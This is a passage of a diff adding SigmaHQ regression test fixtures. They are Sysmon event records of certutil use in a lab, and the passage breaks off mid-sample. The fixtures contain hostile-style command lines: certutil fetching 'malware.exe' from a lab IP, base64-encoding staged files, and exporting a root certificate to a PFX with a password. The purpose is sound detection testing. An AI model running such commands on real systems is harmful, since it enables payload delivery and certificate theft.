@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml
new file mode 100644
index 000000000..c9bf97f46
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml
@@ -0,0 +1,13 @@
+id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
+ title: Suspicious Download Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx
new file mode 100644
index 000000000..73837d70c
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json
new file mode 100644
index 000000000..5de823e73
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:01:06.116464Z" + } + }, + "EventRecordID": 11507958, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:01:06.109", + "ProcessGuid": "5AA13A44-0252-68FD-7235-000000004002", + "ProcessId": 6432, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
new file mode 100644
index 000000000..77577cd85
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml
@@ -0,0 +1,13 @@
+id: 76e024fd-9064-46ae-85f8-c524dc6b3492
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
+ title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx
new file mode 100644
index 000000000..bfc51182e
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json
new file mode 100644
index 000000000..27dce7a6b
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml
new file mode 100644
index 000000000..69a87ef61
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml
@@ -0,0 +1,13 @@
+id: 507f6de5-f414-4825-b1a3-e8909fdc8700
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794
+ title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx
new file mode 100644
index 000000000..a24493108
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json
new file mode 100644
index 000000000..e27376def
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json
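Review bot: The sample behind this file-sharing test is the same event as the generic certutil download test: both .json files share blob `27dce7a6b` in their `index` header lines and render `certutil.exe -urlcache -f https://raw.githubusercontent.com/...`. The test therefore passes only as long as `githubusercontent.com` remains on the rule's domain list, and it never exercises a domain that separates 42a5f1e7 from 19b08b1c, so a list change would surface as a confusing regression of the wrong rule. A dedicated capture against another host the rule lists, or at minimum `description: reuses the githubusercontent.com certutil download sample; depends on that domain staying in the rule's list`, would make the coupling explicit. The rule's domain list is outside this diff, so the dependency is inferred from the sample alone.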
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml
new file mode 100644
index 000000000..cbffd1a7d
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml
@@ -0,0 +1,13 @@
+id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a
+ title: File Encoded To Base64 Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx
new file mode 100644
index 000000000..a24493108
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json
new file mode 100644
index 000000000..e27376def
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:04:22.017117Z"
+ }
+ },
+ "EventRecordID": 11570013,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:04:22.010",
+ "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002",
+ "ProcessId": 3980,
+ "Image": "C:\\Windows\\System32\\certutil.exe",
+ "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
+ "Description": "CertUtil.exe",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CertUtil.exe",
+ "CommandLine": "certutil -encode file.bat file_.base64",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
+ "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
+ "ParentProcessId": 6304,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml
new file mode 100644
index 000000000..e9c14e662
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml
@@ -0,0 +1,13 @@
+id: 7033fe69-1fd7-4da2-b525-222c1b087107
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464
+ title: Suspicious File Encoded To Base64 Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx
new file mode 100644
index 000000000..25f49180b
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json
new file mode 100644
index 000000000..2b673ca59
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:05:11.334152Z"
+ }
+ },
+ "EventRecordID": 11585346,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:05:11.327",
+ "ProcessGuid": "5AA13A44-0347-68FD-8B35-000000004002",
+ "ProcessId": 6780,
+ "Image": "C:\\Windows\\System32\\certutil.exe",
+ "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
+ "Description": "CertUtil.exe",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CertUtil.exe",
+ "CommandLine": "certutil -encode C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\sr011.xml C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\conv.xml",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
+ "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
+ "ParentProcessId": 6304,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml
new file mode 100644
index 000000000..0d8a289ea
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml
@@ -0,0 +1,13 @@
+id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3
+ title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx
new file mode 100644
index 000000000..71da251ef
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json
new file mode 100644
index 000000000..9ec2762cb
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-25T17:23:42.049726Z"
+ }
+ },
+ "EventRecordID": 11818106,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3308,
+ "ThreadID": 4008
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-dc.attackrange.local",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-25 17:23:42.043",
+ "ProcessGuid": "5AA13A44-079E-68FD-0236-000000004002",
+ "ProcessId": 2456,
+ "Image": "C:\\Windows\\System32\\certutil.exe",
+ "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
+ "Description": "CertUtil.exe",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "CertUtil.exe",
+ "CommandLine": "certutil -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\cert.pfx",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
+ "User": "ATTACKRANGE\\Administrator",
+ "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
+ "LogonId": "0x529ae3",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734",
+ "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002",
+ "ParentProcessId": 6304,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
+ "ParentUser": "ATTACKRANGE\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml
new file mode 100644
index 000000000..83cf4ab17
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml
@@ -0,0 +1,13 @@
+id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5
+ title: Certificate Exported Via Certutil.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx
new file mode 100644
index 000000000..394724e61
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json
new file mode 100644
index 000000000..4fde9eb48
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
